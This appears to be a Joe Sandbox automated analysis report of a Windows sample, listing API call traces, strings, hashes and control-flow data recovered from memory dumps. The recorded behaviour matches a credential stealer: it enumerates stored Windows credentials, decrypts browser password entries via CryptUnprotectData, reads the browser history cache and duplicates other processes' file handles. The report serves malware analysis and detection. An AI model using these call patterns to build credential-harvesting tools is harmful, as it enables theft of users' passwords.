                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 767404330-0
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID:
                                                            • API String ID: 1690352074-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0041898C
                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: InfoSystemmemset
                                                            • String ID:
                                                            • API String ID: 3558857096-0
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                            • memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 00407082
                                                              • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: free$memcpymemset
                                                            • String ID:
                                                            • API String ID: 2037443186-0

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 004455C2
                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 0044570D
                                                            • memset.MSVCRT ref: 00445725
                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            • memset.MSVCRT ref: 0044573D
                                                            • memset.MSVCRT ref: 00445755
                                                            • memset.MSVCRT ref: 004458CB
                                                            • memset.MSVCRT ref: 004458E3
                                                            • memset.MSVCRT ref: 0044596E
                                                            • memset.MSVCRT ref: 00445A10
                                                            • memset.MSVCRT ref: 00445A28
                                                            • memset.MSVCRT ref: 00445AC6
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            • memset.MSVCRT ref: 00445B52
                                                            • memset.MSVCRT ref: 00445B6A
                                                            • memset.MSVCRT ref: 00445C9B
                                                            • memset.MSVCRT ref: 00445CB3
                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                            • memset.MSVCRT ref: 00445B82
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                            • memset.MSVCRT ref: 00445986
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                            • API String ID: 1963886904-3798722523

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                            • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                            • String ID: $/deleteregkey$/savelangfile
                                                            • API String ID: 2744995895-28296030

                                                            Control-flow Graph

                                                            APIs
                                                            • memcmp.MSVCRT(-00000007,altertab_,00000009,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431B89
                                                            • memcpy.MSVCRT(?,00000000,00000001,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431D51
                                                            • memcpy.MSVCRT(?,?,00000001,?,?,?,?,?,00000000), ref: 00431E1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID: UNIQUE$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$^C$altertab_$conflicting ON CONFLICT clauses specified$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$table %s has no column named %s$table %s may not be indexed$there is already a table named %s$views may not be indexed$virtual tables may not be indexed
                                                            • API String ID: 3384217055-1911042424
                                                            • Opcode ID: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                            • Instruction ID: e88dbce5606702523dc3cb2fd075dc3f1625e0cc8bc5801943b2d4f1258beff1
                                                            • Opcode Fuzzy Hash: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                            • Instruction Fuzzy Hash: E9328E71A002059FDF14DF65C981AAEBBB1EF08314F2550AEE805AB352D779EE41CF98

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                            • memset.MSVCRT ref: 0040B756
                                                            • memset.MSVCRT ref: 0040B7F5
                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                            • memset.MSVCRT ref: 0040B851
                                                            • memset.MSVCRT ref: 0040B8CA
                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                            • memset.MSVCRT ref: 0040BB53
                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                            • String ID: chp$v10
                                                            • API String ID: 1297422669-2783969131
                                                            • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                            • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 0040E49A
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E3EC
                                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E407
                                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E422
                                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E43D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                            • API String ID: 3849927982-2252543386
                                                            • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                            • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 004091E2
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                            • String ID:
                                                            • API String ID: 3715365532-3916222277
                                                            • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                            • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                            • String ID: bhv
                                                            • API String ID: 4234240956-2689659898
                                                            • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                            • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2941347001-70141382
                                                            • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                            • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • wcschr.MSVCRT ref: 0040C324
                                                            • wcschr.MSVCRT ref: 0040C344
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                            • String ID: visited:
                                                            • API String ID: 2470578098-1702587658
                                                            • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                            • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                            Control-flow Graph

                                                            control_flow_graph 916 40e175-40e1a1 call 40695d call 406b90 921 40e1a7-40e1e5 memset 916->921 922 40e299-40e2a8 call 4069a3 916->922 924 40e1e8-40e1f3 call 406e8f 921->924 927 40e1f8-40e1fa 924->927 928 40e270-40e27d call 406b53 927->928 929 40e1fc-40e219 call 40dd50 * 2 927->929 928->924 934 40e283-40e286 928->934 929->928 940 40e21b-40e21d 929->940 937 40e291-40e294 call 40aa04 934->937 938 40e288-40e290 free 934->938 937->922 938->937 940->928 941 40e21f-40e235 call 40742e 940->941 941->928 944 40e237-40e242 call 40aae3 941->944 944->928 947 40e244-40e26b _snwprintf call 40a8d0 944->947 947->928
                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 0040E28B
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                            • API String ID: 2804212203-2982631422
                                                            • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                            • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                            Control-flow Graph

